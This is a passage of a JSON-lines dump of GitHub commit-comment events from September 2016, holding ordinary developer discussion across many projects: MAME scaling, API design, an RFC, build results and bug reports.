ratio, width squeezed)\nbottom-window: 479x448\nbottom-image 479x224 (broken aspect ratio, width stretched)\n\nThe middle and bottom images are what I would expect when -nokeepaspect is\nused.\n\n2016-09-18 15:50 GMT+02:00 antonioginer <notifications@github.com>:\n\n> Hi Jeeze,\n>\n> For example the fractional scale on the x-axis stops if the target_aspect\n> becomes greater than the src_aspect.\n>\n> I'm quite sure this is not the case. E.g. on a 16:9 monitor (16:9 > 4:3)\n> I'm running:\n>\n> mame64 tengai -window -unevenstretchx -nofilter\n>\n> If you press print screen and paste the result in mspaint, you clearly see\n> the some of the pixels are wider than others, because fractional scaling is\n> indeed being applied.\n>\n> If we didn't allow keepaspect for the fractional scaled axis, we couldn't\n> run vertical games on a horizontally mounted CRT, the way I mentioned some\n> posts above.\n>\n> e.g. tengai -window -nounevenstretch -intoverscan\n>\n> As you can see the scanlines are not even anymore, which indicates that the\n> scaling might not be integer.\n>\n> I've tried the same print screen trick (without hlsl enabled) and\n> definitely integer scaling is still being applied regardless of overscan.\n> However, when I enable hlsl, I can clearly see the issue you're saying. I'd\n> say it has to do with the way the shader is being mapped to the buffer,\n> although that's far beyond my understanding.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mamedev/mame/commit/161a08dd4acd792c71d665d3abc16c3093053de8#commitcomment-19070705>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALaNp8O-aRC3eLgO4sn1bHNFQmtjZV5Yks5qrUGbgaJpZM4JjyL4>\n> .\n>\n"}},"created_at":"2016-09-26T10:53:31Z"}
{"id":"4617076680","type":"CommitCommentEvent","actor":{"login":"fabricioflores"},"repo":{"name":"noggalito/porttare-frontend"},"payload":{"comment":{"id":19170405,"position":14,"line":52,"path":"app/scripts/services/clients-service.js","commit_id":"c255bdb4c87e36095101c1c5c6cae9a1554b6710","created_at":"2016-09-26T10:54:06Z","updated_at":"2016-09-26T10:54:06Z","body":"hay bastantes pruebas unitarias de servicios... y nuestro coverage está en 50%. Así que de ley este PR va a tener tests... "}},"created_at":"2016-09-26T10:54:06Z"}
{"id":"4617077827","type":"CommitCommentEvent","actor":{"login":"kubukoz"},"repo":{"name":"kubukoz/akka-http"},"payload":{"comment":{"id":19170406,"position":5,"line":209,"path":"docs/src/test/scala/docs/http/scaladsl/HttpClientExampleSpec.scala","commit_id":"d52285ca69e4ffd1e6d92a858c0574b8fbd98e0d","created_at":"2016-09-26T10:54:21Z","updated_at":"2016-09-26T10:54:21Z","body":"yeah, that's probably right."}},"created_at":"2016-09-26T10:54:21Z"}
{"id":"4617083159","type":"CommitCommentEvent","actor":{"login":"Signmark"},"repo":{"name":"Signmark/ATMTA-Station"},"payload":{"comment":{"id":19170412,"position":null,"line":null,"path":null,"commit_id":"75b3fc9ec9ea2347f2a43429c5b6e7d514fb41c6","created_at":"2016-09-26T10:55:35Z","updated_at":"2016-09-26T10:55:35Z","body":"ты чего это делаешь"}},"created_at":"2016-09-26T10:55:35Z"}
{"id":"4617085097","type":"CommitCommentEvent","actor":{"login":"HarelM"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19170415,"position":233,"line":1067,"path":"IsrealHiking.Web/controllers/InfoController.ts","commit_id":"f4f87ff76f1b6249992be477664c9ed09d81cd01","created_at":"2016-09-26T10:56:01Z","updated_at":"2016-09-26T10:56:01Z","body":"Let's leave google earth aside for a moment (I agree the legend for it should be removed).\r\nThe logic behind this decision is that everything that is common for both IHM and MTB has a high chance to appear in a user defined map that is tile based - and the user who adds this map can open the legend and see how (and if) those features are printed on the map he added.\r\nI think it can be benificial.\r\nAssuming we add another map (which is a huge IF) we'll need to do the same process of selecting relevant legend cases and we'll need to add another else-if to the current code, which I think is a reasonable requirement."}},"created_at":"2016-09-26T10:56:01Z"}
{"id":"4617085963","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170417,"position":18,"line":18,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T10:56:13Z","updated_at":"2016-09-26T10:56:13Z","body":"I reckon it would be useful for API clients for `created` and `lastUpdated` to be `datetime` (so they could show time as well as date in their UI). FWIW they included time in the non-RAML README.md too"}},"created_at":"2016-09-26T10:56:13Z"}
{"id":"4617087233","type":"CommitCommentEvent","actor":{"login":"vobruba-martin"},"repo":{"name":"google/closure-compiler"},"payload":{"comment":{"id":19170418,"position":null,"line":null,"path":null,"commit_id":"82f23897059d244d793518a1355fe2e1cc0ba80f","created_at":"2016-09-26T10:56:30Z","updated_at":"2016-09-26T10:56:30Z","body":"@dimvar My compiled code size is increased by ~5% (~10KB) after this commit. Also typed percentage decreased from 99.95% to 94.64% (I'm using `--use_types_for_optimization`) and I get no warnings with `reportUnknownTypes`. Is it expected?"}},"created_at":"2016-09-26T10:56:30Z"}
{"id":"4617088879","type":"CommitCommentEvent","actor":{"login":"maciboy"},"repo":{"name":"flowgrow/ChitChat"},"payload":{"comment":{"id":19170426,"position":null,"line":null,"path":null,"commit_id":"1e45f8ca40a621b1a764336bfcbd9b969827b38c","created_at":"2016-09-26T10:56:53Z","updated_at":"2016-09-26T10:56:53Z","body":"Why is 😂 gone missing again? 😞\r\n\r\nNevertheless, thanks for this update, just built it and really like it!"}},"created_at":"2016-09-26T10:56:53Z"}
{"id":"4617094456","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170435,"position":26,"line":26,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T10:58:13Z","updated_at":"2016-09-26T10:58:13Z","body":"But there's no reason to use the checkpoint instead of the current group members: The current ones are what's relevant to authenticating most messages. I think it's rather just the neighbouring groups that need to collect the checkpoints and the link blocks since then, to in turn verify the current group members. Once they have verified them, though, they should use them for the Merkle tree, and not the checkpoint."}},"created_at":"2016-09-26T10:58:13Z"}
{"id":"4617094651","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170436,"position":15,"line":15,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T10:58:16Z","updated_at":"2016-09-26T10:58:16Z","body":"Done"}},"created_at":"2016-09-26T10:58:16Z"}
{"id":"4617094767","type":"CommitCommentEvent","actor":{"login":"afck"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170437,"position":13,"line":13,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T10:58:18Z","updated_at":"2016-09-26T10:58:18Z","body":"I think those two RFCs are rather orthogonal to each other: They address different concerns and don't depend on one another."}},"created_at":"2016-09-26T10:58:18Z"}
{"id":"4617096305","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19170441,"position":null,"line":null,"path":null,"commit_id":"96a97f9b8691ae365b86c0516b23b9f6de9d464a","created_at":"2016-09-26T10:58:40Z","updated_at":"2016-09-26T10:58:40Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1160](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=14231&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 261, ignored: 3 Build time: 00:14:14"}},"created_at":"2016-09-26T10:58:40Z"}
{"id":"4617101105","type":"CommitCommentEvent","actor":{"login":"WanWizard"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170446,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T10:59:49Z","updated_at":"2016-09-26T10:59:49Z","body":"I was hoping for those. Thanks. How do you access the input from these posts? Because that bit of code hasn't changed, so if your \"Content-Type\" has always included a Charset, Input has never been able to decode the input?"}},"created_at":"2016-09-26T10:59:49Z"}
{"id":"4617101346","type":"CommitCommentEvent","actor":{"login":"NatashaTheRobot"},"repo":{"name":"tryswift/trySwiftNYC"},"payload":{"comment":{"id":19170448,"position":null,"line":null,"path":null,"commit_id":"7e203ab92dbfbbaae87f261829e47894ed2229d0","created_at":"2016-09-26T10:59:52Z","updated_at":"2016-09-26T10:59:52Z","body":"Thanks!\n\nOn Sun, Sep 25, 2016 at 1:38 PM, Bas Broek <notifications@github.com> wrote:\n\n> Nice work! I remember having tried this in the best, but I hit some walls\n> and didn't finish it then.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tryswift/trySwiftNYC/commit/7e203ab92dbfbbaae87f261829e47894ed2229d0#commitcomment-19163339>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABGoG6xk6rDRqIs0FFA2-xYnjyUoJIFQks5qtl1MgaJpZM4KF4b2>\n> .\n>\n\n\n\n-- \nnatasha murashev | natashamurashev.com | 202-412-4678 | @natashamurashev\n"}},"created_at":"2016-09-26T10:59:52Z"}
{"id":"4617102696","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19170450,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-26T11:00:11Z","updated_at":"2016-09-26T11:00:11Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.180](http://build.clear-measure.com/viewLog.html?buildId=10709&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) is now running\n"}},"created_at":"2016-09-26T11:00:11Z"}
{"id":"4617104176","type":"CommitCommentEvent","actor":{"login":"cuboideum"},"repo":{"name":"RDFBones/FrSexEst"},"payload":{"comment":{"id":19170453,"position":174,"line":662,"path":"ExtensionFrSexEst.owl","commit_id":"f7e548fd3e4d9557ab13df1a0e3f01ddcd7f7ee3","created_at":"2016-09-26T11:00:30Z","updated_at":"2016-09-26T11:00:30Z","body":"Now fixed with commits [f98f270d222b05b48ac2ef0ecab3d0a51fbe29f9](https://github.com/RDFBones/RDFBones-O/wiki/Investigation-planning/f98f270d222b05b48ac2ef0ecab3d0a51fbe29f9) and [64ec577ddb5470f2e14e81894c688769a1a0fae1](https://github.com/RDFBones/RDFBones-O/wiki/Investigation-planning/64ec577ddb5470f2e14e81894c688769a1a0fae1)."}},"created_at":"2016-09-26T11:00:30Z"}
{"id":"4617104661","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170455,"position":28,"line":28,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:00:35Z","updated_at":"2016-09-26T11:00:35Z","body":"I would be tempted to remove `agentName` initially on the basis that it's easier to add thinks to an API than remove them, and because having `agentName` in here could require us to resolve questions such as \"does the fact that a specific agent is named mean that accepting this invitation will grant access to the specific named person only, not all users in the agency?\".\r\n\r\nIs our approach to delegation / individual agent assignment to push it all into 3rd party software? And if so does having individuals in our API muddy the waters?"}},"created_at":"2016-09-26T11:00:35Z"}
{"id":"4617104680","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/barsoom_utils"},"payload":{"comment":{"id":19170456,"position":5,"line":28,"path":"README.md","commit_id":"f7cdbfc846a37d7723db2377673d06f2d72fa988","created_at":"2016-09-26T11:00:35Z","updated_at":"2016-09-26T11:00:35Z","body":"Ah. You're saying that this should be worded more strongly? Maybe with an example as well: \"you should only set it in production, or multiple environments will trigger each other's checks\""}},"created_at":"2016-09-26T11:00:35Z"}
{"id":"4617108179","type":"CommitCommentEvent","actor":{"login":"yakovru"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":19170465,"position":null,"line":null,"path":null,"commit_id":"789fdaf49f970e33a7b95560f703b6204298303f","created_at":"2016-09-26T11:01:22Z","updated_at":"2016-09-26T11:01:22Z","body":"LanguageTool-20160925-snapshot gives a 'spelling mistake' message for 'otitis' for en_US locale, not for en_GB.\r\n"}},"created_at":"2016-09-26T11:01:22Z"}
{"id":"4617110668","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/barsoom_utils"},"payload":{"comment":{"id":19170469,"position":5,"line":28,"path":"README.md","commit_id":"f7cdbfc846a37d7723db2377673d06f2d72fa988","created_at":"2016-09-26T11:01:57Z","updated_at":"2016-09-26T11:01:57Z","body":"I worded it more strongly but skipped the example since there are also more reasons and they're quite obvious once you think about it: https://github.com/barsoom/barsoom_utils/commit/20e39a116dce45b9742180419444efc34bd91f8d"}},"created_at":"2016-09-26T11:01:57Z"}
{"id":"4617111820","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170473,"position":34,"line":34,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:02:13Z","updated_at":"2016-09-26T11:02:13Z","body":"I think that what we ended up with on the whiteboard had 'sent' in the URL. Maybe it was `/agencies/{arn}/invitations/sent`, maybe there were some other path segments too."}},"created_at":"2016-09-26T11:02:13Z"}
{"id":"4617112252","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/path-key"},"payload":{"comment":{"id":19170475,"position":18,"line":12,"path":"index.js","commit_id":"c71c58a779e8c323c68b86ab289c6978026db643","created_at":"2016-09-26T11:02:19Z","updated_at":"2016-09-26T11:02:19Z","body":"Ah, totally forgot about Array#find. => https://github.com/sindresorhus/path-key/commit/14623e81f4ea6f96112f219daecb560f1e093a47"}},"created_at":"2016-09-26T11:02:19Z"}
{"id":"4617112309","type":"CommitCommentEvent","actor":{"login":"gkahiu"},"repo":{"name":"gltn/stdm"},"payload":{"comment":{"id":19170476,"position":null,"line":null,"path":null,"commit_id":"3927828dcfd5fcb747e2f5eaf46b53c244b0eca9","created_at":"2016-09-26T11:02:20Z","updated_at":"2016-09-26T11:02:20Z","body":"@wondie , why dont you construct and return the QColor object from the function since it is already called `selection_color()` so one would expect the actual color object instead of the R, G, B and alpha values.\r\n\r\nAlso, the registry keys are ambiguous e.g. why call it red = int(red_dic['default_selection_color_red']) and not **selection_red**? "}},"created_at":"2016-09-26T11:02:20Z"}
{"id":"4617112422","type":"CommitCommentEvent","actor":{"login":"flowgrow"},"repo":{"name":"flowgrow/ChitChat"},"payload":{"comment":{"id":19170478,"position":null,"line":null,"path":null,"commit_id":"1e45f8ca40a621b1a764336bfcbd9b969827b38c","created_at":"2016-09-26T11:02:21Z","updated_at":"2016-09-26T11:02:21Z","body":"Thats a good question haha. I didn't realize it was missing. I figured all\nof the previous ones would be there because the list was sp big. You can\njust add it back\n\n>\n"}},"created_at":"2016-09-26T11:02:21Z"}
{"id":"4617114853","type":"CommitCommentEvent","actor":{"login":"JustinMason"},"repo":{"name":"ClearMeasureLabs/ClearMeasureBootcamp"},"payload":{"comment":{"id":19170485,"position":null,"line":null,"path":null,"commit_id":"18a0978b24243fc97f75ff353bd7a4856499dd37","created_at":"2016-09-26T11:02:55Z","updated_at":"2016-09-26T11:02:55Z","body":"TeamCity ClearMeasureBootcamp :: 1 - Integration Build [Build 2.0.180](http://build.clear-measure.com/viewLog.html?buildId=10709&buildTypeId=ClearMeasureBootcamp_1IntegrationBuild&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72, ignored: 2 Build time: 00:02:43"}},"created_at":"2016-09-26T11:02:55Z"}
{"id":"4617115143","type":"CommitCommentEvent","actor":{"login":"ashimokawa"},"repo":{"name":"Freeyourgadget/Gadgetbridge"},"payload":{"comment":{"id":19170486,"position":10,"line":0,"path":"app/src/main/java/nodomain/freeyourgadget/gadgetbridge/service/btle/profiles/heartrate/BodySensorLocation.java","commit_id":"d4b134a490213445d737572e77adb88f2c125654","created_at":"2016-09-26T11:02:59Z","updated_at":"2016-09-26T11:02:59Z","body":"Chest?"}},"created_at":"2016-09-26T11:02:59Z"}
{"id":"4617115178","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170487,"position":34,"line":34,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:02:59Z","updated_at":"2016-09-26T11:02:59Z","body":"it might avoid confusion if we called the parameter `{mtdArn}` to make it clear that it is not one of the existing ARNs (e.g. the CESA ARN)"}},"created_at":"2016-09-26T11:02:59Z"}
{"id":"4617117666","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170491,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T11:03:33Z","updated_at":"2016-09-26T11:03:33Z","body":"Bon, c'est très bizarre : \r\nVoici 2 print que j'ai ajoutés\r\n```python\r\n print('AcademicYear type : {}'.format(type(pgm_manager.offer_year.academic_year.year)))\r\n print('Academic Year used : {}'.format(pgm_manager.offer_year.academic_year.year))\r\n```\r\nCe qui donne comme résultat:\r\n```python\r\nAcademicYear type : <class 'str'>\r\nAcademic Year used : 2999\r\n```\r\n\r\nMais si je fait `print(pgm_manager.offer_year.academic_year)`\r\n```python\r\nFile \"/media/Info/UCL/OSIS/osis-project/osis/base/models/academic_year.py\", line 50, in __str__\r\n    return u\"%s-%s\" % (self.year, self.year + 1)\r\nTypeError: Can't convert 'int' object to str implicitly\r\n```\r\nCar la méthode d'affichage de AcademicYear est mauvaise (ça devrait être `u\"%d-%d\" % (self.year, self.year + 1)` )"}},"created_at":"2016-09-26T11:03:33Z"}
{"id":"4617120867","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170498,"position":30,"line":30,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T11:04:16Z","updated_at":"2016-09-26T11:04:16Z","body":"May be worth swapping every 10 mins to network period and then have this as further work, to define a network period? This period may be random, deterministic or based on some entropy of the network? "}},"created_at":"2016-09-26T11:04:16Z"}
{"id":"4617121247","type":"CommitCommentEvent","actor":{"login":"piotrasd"},"repo":{"name":"LibreELEC/LibreELEC.tv"},"payload":{"comment":{"id":19170500,"position":null,"line":null,"path":null,"commit_id":"f65fa6bbe84fa0bca00fea0a5e8cb02180ef4986","created_at":"2016-09-26T11:04:22Z","updated_at":"2016-09-26T11:04:22Z","body":"thats ok ? 2 PKG VERSION ? "}},"created_at":"2016-09-26T11:04:22Z"}
{"id":"4617121802","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170501,"position":45,"line":45,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:04:30Z","updated_at":"2016-09-26T11:04:30Z","body":"Can we get away without this :wink: ? Especially since according to Reda in the clinic there are no/few existing implementations on the platform so if we add this we will be the first and other services should then be consistent with us"}},"created_at":"2016-09-26T11:04:30Z"}
{"id":"4617124089","type":"CommitCommentEvent","actor":{"login":"infinitekh"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":19170505,"position":null,"line":null,"path":null,"commit_id":"b46eabecd3d6e8ea6dd3dc5a948ecbb65d818205","created_at":"2016-09-26T11:05:04Z","updated_at":"2016-09-26T11:05:04Z","body":"After I  patched this code, youtube-dl become to  works well"}},"created_at":"2016-09-26T11:05:04Z"}
{"id":"4617125611","type":"CommitCommentEvent","actor":{"login":"lolepezy"},"repo":{"name":"RIPE-NCC/rpki-validator"},"payload":{"comment":{"id":19170509,"position":5,"line":48,"path":"rpki-validator-app/src/main/scala/net/ripe/rpki/validator/models/ValidatedObjects.scala","commit_id":"9c81c3feb2f43d5322f1780334d280d51c556347","created_at":"2016-09-26T11:05:25Z","updated_at":"2016-09-26T11:05:25Z","body":"Isn't it something like a linked list by default? It could be heavy in this case."}},"created_at":"2016-09-26T11:05:25Z"}
{"id":"4617126982","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170512,"position":37,"line":37,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T11:05:45Z","updated_at":"2016-09-26T11:05:45Z","body":"So perhaps the last hash ? and the current hash or similar so that nodes can detect there is a notion of a new hash they have not seen and back of with an answer for a network Period to confirm the new hash? "}},"created_at":"2016-09-26T11:05:45Z"}
{"id":"4617127636","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170513,"position":45,"line":45,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:05:54Z","updated_at":"2016-09-26T11:05:54Z","body":"by the way, the discussions with 3rd party software vendors last Friday were quite high level so I didn't get the chance to ask them about whether they preferred 200 or 204. We did collect some contacts that we can share the proposed API spec with though."}},"created_at":"2016-09-26T11:05:54Z"}
{"id":"4617128170","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"sindresorhus/path-key"},"payload":{"comment":{"id":19170516,"position":18,"line":12,"path":"index.js","commit_id":"c71c58a779e8c323c68b86ab289c6978026db643","created_at":"2016-09-26T11:06:02Z","updated_at":"2016-09-26T11:06:02Z","body":":+1:"}},"created_at":"2016-09-26T11:06:02Z"}
{"id":"4617131579","type":"CommitCommentEvent","actor":{"login":"dirvine"},"repo":{"name":"afck/rfcs"},"payload":{"comment":{"id":19170524,"position":45,"line":45,"path":"text/0000-group-merkle-tree/0000-group-merkle-tree.md","commit_id":"3395a575cfd9eb338451977882b8fde030920372","created_at":"2016-09-26T11:06:50Z","updated_at":"2016-09-26T11:06:50Z","body":"Perhaps this is saying that group consensus must be assumed, this RFC aids this partially but does rely on XX YY ZZ rfc's to also be in place? "}},"created_at":"2016-09-26T11:06:50Z"}
{"id":"4617132209","type":"CommitCommentEvent","actor":{"login":"cymruu"},"repo":{"name":"cymruu/wykop-es6"},"payload":{"comment":{"id":19170526,"position":null,"line":null,"path":null,"commit_id":"1b892cd926ef4799068a19f19815fd2ac5fbb843","created_at":"2016-09-26T11:07:00Z","updated_at":"2016-09-26T11:07:00Z","body":"Loadsh trzeba zaaktualizować, ale zainstalowanie nowej wersji spowodowało że libka się nie logowała (na wykop), bez żadnego błędu. "}},"created_at":"2016-09-26T11:07:00Z"}
{"id":"4617132538","type":"CommitCommentEvent","actor":{"login":"olivierchatry"},"repo":{"name":"knownasilya/ember-cli-deploy-gcloud-storage"},"payload":{"comment":{"id":19170527,"position":null,"line":null,"path":null,"commit_id":"e69439bcf1228904e9429e6b91d34597240b0c09","created_at":"2016-09-26T11:07:04Z","updated_at":"2016-09-26T11:07:04Z","body":"Seems like it is working, at least for my application."}},"created_at":"2016-09-26T11:07:04Z"}
{"id":"4617133552","type":"CommitCommentEvent","actor":{"login":"Blasphemous"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19170529,"position":null,"line":null,"path":null,"commit_id":"4b990eb7d7fda3951e640d84a5c18c90366cd26b","created_at":"2016-09-26T11:07:19Z","updated_at":"2016-09-26T11:07:19Z","body":"You're the Man, brother!"}},"created_at":"2016-09-26T11:07:19Z"}
{"id":"4617135671","type":"CommitCommentEvent","actor":{"login":"it-can"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170536,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T11:07:47Z","updated_at":"2016-09-26T11:07:47Z","body":"I use ```\\Input::post('field');``` in my controller, my ajax does a POST (via jquery ```$.post```"}},"created_at":"2016-09-26T11:07:47Z"}
{"id":"4617136017","type":"CommitCommentEvent","actor":{"login":"Yomodo"},"repo":{"name":"alphaleonis/AlphaFS"},"payload":{"comment":{"id":19170541,"position":null,"line":null,"path":null,"commit_id":"30865b48e8748ddc28e2208659423271230c1699","created_at":"2016-09-26T11:07:53Z","updated_at":"2016-09-26T11:07:53Z","body":"I compiled and added them to address issue #255 and #256.\r\nBut yeah, they should be removed."}},"created_at":"2016-09-26T11:07:53Z"}
{"id":"4617140611","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170549,"position":16,"line":16,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:09:02Z","updated_at":"2016-09-26T11:09:02Z","body":"there is no `clientRegimeId` property, is that deliberate?\r\nif so how will agency users know which invitation is which when they view their list of invitations?"}},"created_at":"2016-09-26T11:09:02Z"}
{"id":"4617141093","type":"CommitCommentEvent","actor":{"login":"WanWizard"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170554,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T11:09:08Z","updated_at":"2016-09-26T11:09:08Z","body":"Fix pushed to remove the optional parameters from the content type."}},"created_at":"2016-09-26T11:09:08Z"}
{"id":"4617141577","type":"CommitCommentEvent","actor":{"login":"glamarca"},"repo":{"name":"uclouvain/osis"},"payload":{"comment":{"id":19170555,"position":14,"line":53,"path":"base/tests/models/test_models_signals.py","commit_id":"0fe68981c2dbff18ba8584464cddc2496e250b8c","created_at":"2016-09-26T11:09:15Z","updated_at":"2016-09-26T11:09:15Z","body":"Et de plus en plus bizarre, en changeant la méthode d'affichage, ça donne la même erreur : \r\n```python\r\nFile \"/media/Info/UCL/OSIS/osis-project/osis/base/models/academic_year.py\", line 50, in __str__\r\n    return u\"%d-%d\" % (self.year, self.year + 1)\r\nTypeError: Can't convert 'int' object to str implicitly\r\n```"}},"created_at":"2016-09-26T11:09:15Z"}
{"id":"4617143865","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170560,"position":52,"line":52,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:09:45Z","updated_at":"2016-09-26T11:09:45Z","body":"I thought the body would contain a `regime` and a `clientRegimeId` (i.e. it would be a subset of the `Invitation` JSON type)"}},"created_at":"2016-09-26T11:09:45Z"}
{"id":"4617153852","type":"CommitCommentEvent","actor":{"login":"fackovcova5"},"repo":{"name":"Larcele/TISTest"},"payload":{"comment":{"id":19170581,"position":4,"line":2,"path":"hanoi.c","commit_id":"b89e84b985b27197bb26178a10bb2fd4d9eefdee","created_at":"2016-09-26T11:12:12Z","updated_at":"2016-09-26T11:12:12Z","body":"gramaticka chyba!"}},"created_at":"2016-09-26T11:12:12Z"}
{"id":"4617154027","type":"CommitCommentEvent","actor":{"login":"frankoid"},"repo":{"name":"hmrc/agent-client-authorisation"},"payload":{"comment":{"id":19170584,"position":72,"line":72,"path":"invitations.raml","commit_id":"871ec7123e8571e49b817cf05e882e88264b84aa","created_at":"2016-09-26T11:12:15Z","updated_at":"2016-09-26T11:12:15Z","body":"How come this resource only has 401 but the one above has 401 and 403 as possibilities.\r\nMight be worth looking at RAML traits to see whether we can define one for the cross cutting authentication/access control concerns (i.e. document the 401 and 403 codes once in a trait and just reference that trait in all the resources)"}},"created_at":"2016-09-26T11:12:15Z"}
{"id":"4617154250","type":"CommitCommentEvent","actor":{"login":"it-can"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170585,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T11:12:17Z","updated_at":"2016-09-26T11:12:17Z","body":"not in this project I think..."}},"created_at":"2016-09-26T11:12:17Z"}
{"id":"4617155478","type":"CommitCommentEvent","actor":{"login":"opradu"},"repo":{"name":"tagDiv/013"},"payload":{"comment":{"id":19170589,"position":4,"line":42,"path":"functions.php","commit_id":"cf04ad56df0118b0c3417243f98a0ec34c07b0f7","created_at":"2016-09-26T11:12:35Z","updated_at":"2016-09-26T11:12:35Z","body":"@cristealucian lipseste - tre sa fie -menu-script si mai jos"}},"created_at":"2016-09-26T11:12:35Z"}
{"id":"4617155806","type":"CommitCommentEvent","actor":{"login":"dsblank"},"repo":{"name":"gramps-project/gramps"},"payload":{"comment":{"id":19170590,"position":null,"line":null,"path":null,"commit_id":"a9f137752938aa067a570f104dbbd8e8a360943b","created_at":"2016-09-26T11:12:39Z","updated_at":"2016-09-26T11:12:39Z","body":"Yes, that is a good idea. "}},"created_at":"2016-09-26T11:12:39Z"}
{"id":"4617157219","type":"CommitCommentEvent","actor":{"login":"it-can"},"repo":{"name":"fuel/core"},"payload":{"comment":{"id":19170596,"position":null,"line":null,"path":null,"commit_id":"90c357e93911278c610c3c7f7aca7156aebab359","created_at":"2016-09-26T11:13:01Z","updated_at":"2016-09-26T11:13:01Z","body":"last commit seems to work"}},"created_at":"2016-09-26T11:13:01Z"}
